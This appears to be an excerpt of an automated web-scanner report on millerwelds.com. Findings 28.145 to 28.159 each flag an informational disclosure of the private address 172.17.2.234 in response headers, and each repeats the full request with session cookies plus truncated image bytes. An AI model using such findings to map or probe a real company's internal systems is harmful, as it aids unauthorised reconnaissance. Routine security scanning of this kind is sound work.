User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/png
Expires: Wed, 11 May 2011 08:33:10 GMT
Last-Modified: Thu, 13 Jan 2011 17:59:38 GMT
Content-Length: 355
Date: Fri, 06 May 2011 19:11:36 GMT
X-Varnish: 1128232817 1097587284
Age: 211107
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

.PNG
.
...IHDR....................`PLTE...x.j...........{.........eoZ............\eRPXG....)D.x...1>Wgox......AMdYbO......tf........;6.:.....IDATH...... .@.@..Dh..l.........O...GU".....?.G.,../YF.
...[SNIP]...
28.145. http://www.millerwelds.com/financing/images/plinenavhead_min.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/plinenavhead_min.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /financing/images/plinenavhead_min.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/png
Expires: Wed, 11 May 2011 08:33:11 GMT
Last-Modified: Thu, 13 Jan 2011 17:59:38 GMT
Content-Length: 398
Date: Fri, 06 May 2011 19:11:36 GMT
X-Varnish: 1128232816 1097587347
Age: 211106
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

.PNG
.
...IHDR..............B......PLTE...............dm............................}................................BNe.............!=....#@.;T..........................~?Kb..........&B............
...[SNIP]...
28.146. http://www.millerwelds.com/financing/images/powerline_bg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /financing/images/powerline_bg.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29451
Date: Fri, 06 May 2011 19:11:35 GMT
X-Varnish: 1128232738 1128232702
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
28.147. http://www.millerwelds.com/financing/images/powerline_head.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_head.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /financing/images/powerline_head.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/png
Expires: Wed, 11 May 2011 08:33:09 GMT
Last-Modified: Thu, 13 Jan 2011 17:59:38 GMT
Content-Length: 33171
Date: Fri, 06 May 2011 19:11:36 GMT
X-Varnish: 1128232814 1097587240
Age: 211107
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

.PNG
.
...IHDR.............yx......tEXtSoftware.Adobe ImageReadyq.e<....PLTE*L....
h....)P..Fl.-O....u.....m..T.....c..y.....q..|....s..........."X.\v...........a.%U..........B..h..
8_.]...........k
...[SNIP]...
28.148. http://www.millerwelds.com/images/footer-social-sprite.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /images/footer-social-sprite.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/footer-social-sprite.jpg HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/jpeg
Expires: Fri, 13 May 2011 17:58:51 GMT
Last-Modified: Thu, 13 Jan 2011 18:01:07 GMT
Content-Length: 4596
Date: Fri, 06 May 2011 19:11:38 GMT
X-Varnish: 1128233125 1127467359
Age: 4368
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................ ....
...[SNIP]...
28.149. http://www.millerwelds.com/images/go-search.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /images/go-search.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/go-search.jpg HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/jpeg
Expires: Fri, 13 May 2011 17:58:49 GMT
Last-Modified: Thu, 13 Jan 2011 18:01:01 GMT
Content-Length: 729
Date: Fri, 06 May 2011 19:11:32 GMT
X-Varnish: 1128232175 1127467014
Age: 4363
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...........................................................................................................!..
...[SNIP]...
28.150. http://www.millerwelds.com/images/logo_printable.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /images/logo_printable.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/logo_printable.gif HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/gif
Expires: Fri, 13 May 2011 17:58:49 GMT
Last-Modified: Thu, 13 Jan 2011 18:01:03 GMT
Content-Length: 1636
Date: Fri, 06 May 2011 19:11:29 GMT
X-Varnish: 1128231697 1127467016
Age: 4361
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

GIF89ad.,..........iiiIII......ZZZ...mmm.........eee......rrr,,,...AAA...222...%%%.........XXX.................................{{{```^^^            ...888<<<(((:::~~~NNNuuu555"""666www...***GGG000.............
...[SNIP]...
28.151. http://www.millerwelds.com/images/nav-new/aboutus.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /images/nav-new/aboutus.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav-new/aboutus.gif HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/gif
Expires: Fri, 13 May 2011 17:58:51 GMT
Last-Modified: Thu, 13 Jan 2011 18:00:09 GMT
Content-Length: 519
Date: Fri, 06 May 2011 19:11:34 GMT
X-Varnish: 1128232479 1127467389
Age: 4363
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

GIF89aO.*.......333...@@@..................```...ppp......000PPP...... ......15:...........................!.......,....O.*....`&.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...)..z...xL..-..z.n....|>.
...[SNIP]...
28.152. http://www.millerwelds.com/images/nav-new/blog.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /images/nav-new/blog.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav-new/blog.gif HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/gif
Expires: Fri, 13 May 2011 17:58:51 GMT
Last-Modified: Thu, 13 Jan 2011 18:00:09 GMT
Content-Length: 653
Date: Fri, 06 May 2011 19:11:34 GMT
X-Varnish: 1128232483 1127467390
Age: 4363
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

GIF89a..0.......)))......#$#\\\...KLKbbbdddUUU
.:;<;
C @lQ..@132.8...=
W(.R2.t6.r1'zG.@* .N*.V.e7....y4.f2    i/v.....
|7.4 ..@.x?'2+..J.,.....M:"+%^..M.rD.j....Z/Z.}7.`..3.]m..NWQV_Z.....Ye..H.n..G..;/
...[SNIP]...
28.153. http://www.millerwelds.com/images/nav-new/forums.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /images/nav-new/forums.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav-new/forums.gif HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/gif
Expires: Fri, 13 May 2011 17:58:51 GMT
Last-Modified: Thu, 13 Jan 2011 18:00:09 GMT
Content-Length: 1236
Date: Fri, 06 May 2011 19:11:34 GMT
X-Varnish: 1128232484 1127467391
Age: 4363
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

GIF89a..0..........+Y....T..3Lg......W..Vdr...t..VWXddc......h..cx...................9b....W]d|.........Z..-N......*:M......,--u........Ge.U}..Fuhfc7AK.V..!+-f.DViF|..............C....D[ulkkSk....Hw..
...[SNIP]...
28.154. http://www.millerwelds.com/images/nav-new/indust_interests.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /images/nav-new/indust_interests.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav-new/indust_interests.gif HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/gif
Expires: Fri, 13 May 2011 17:58:51 GMT
Last-Modified: Thu, 13 Jan 2011 18:00:09 GMT
Content-Length: 877
Date: Fri, 06 May 2011 19:11:33 GMT
X-Varnish: 1128232358 1127467388
Age: 4362
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

GIF89a..*....@@@..................```000 ......ppp...PPP.........333.......................................!.......,......*.... %.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.....z.n....dN.
...[SNIP]...
28.155. http://www.millerwelds.com/images/nav-new/powerclick01.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /images/nav-new/powerclick01.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav-new/powerclick01.gif HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/gif
Expires: Fri, 13 May 2011 17:58:51 GMT
Last-Modified: Thu, 13 Jan 2011 18:00:09 GMT
Content-Length: 980
Date: Fri, 06 May 2011 19:11:34 GMT
X-Varnish: 1128232485 1127467396
Age: 4363
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

GIF89a..0....BBB...UUUinr.........;;;uuv2IW......%s.+Nna|.]]]...ddd%%%....=k..........F{...aaa.........lmn...)))......XXX....2J...`.....222.......a....fjkHHI..........i..........,,,.O....... OOO\fm_
...[SNIP]...
28.156. http://www.millerwelds.com/images/nav-new/products.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /images/nav-new/products.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav-new/products.gif HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/gif
Expires: Fri, 13 May 2011 17:58:51 GMT
Last-Modified: Thu, 13 Jan 2011 18:00:09 GMT
Content-Length: 788
Date: Fri, 06 May 2011 19:11:32 GMT
X-Varnish: 1128232177 1127467354
Age: 4361
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

GIF89an.*....@@@............}................kmo...........................JMO...6<C........................!.......,....n.*....`'.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...x...*..z.n....|..
...[SNIP]...
28.157. http://www.millerwelds.com/images/nav-new/resources.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /images/nav-new/resources.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav-new/resources.gif HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/gif
Expires: Fri, 13 May 2011 17:58:51 GMT
Last-Modified: Thu, 13 Jan 2011 18:00:09 GMT
Content-Length: 588
Date: Fri, 06 May 2011 19:11:32 GMT
X-Varnish: 1128232183 1127467385
Age: 4361
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

GIF89a].*.......333@@@............... ...```999000......ppp......PPP:99::9.................................!.......,....].*....`%.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.....z.....|N.
...[SNIP]...
28.158. http://www.millerwelds.com/images/nav-new/service.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /images/nav-new/service.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav-new/service.gif HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/gif
Expires: Fri, 13 May 2011 17:58:51 GMT
Last-Modified: Thu, 13 Jan 2011 18:00:09 GMT
Content-Length: 486
Date: Fri, 06 May 2011 19:11:32 GMT
X-Varnish: 1128232181 1127467358
Age: 4361
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

GIF89aL.*.......333......@@@///...... ......```...000......PPP...ppp.......................................!.......,....L.*.....%.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...x,.....z.n...H.N.
...[SNIP]...
28.159. http://www.millerwelds.com/images/nav-new/wheretobuy.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
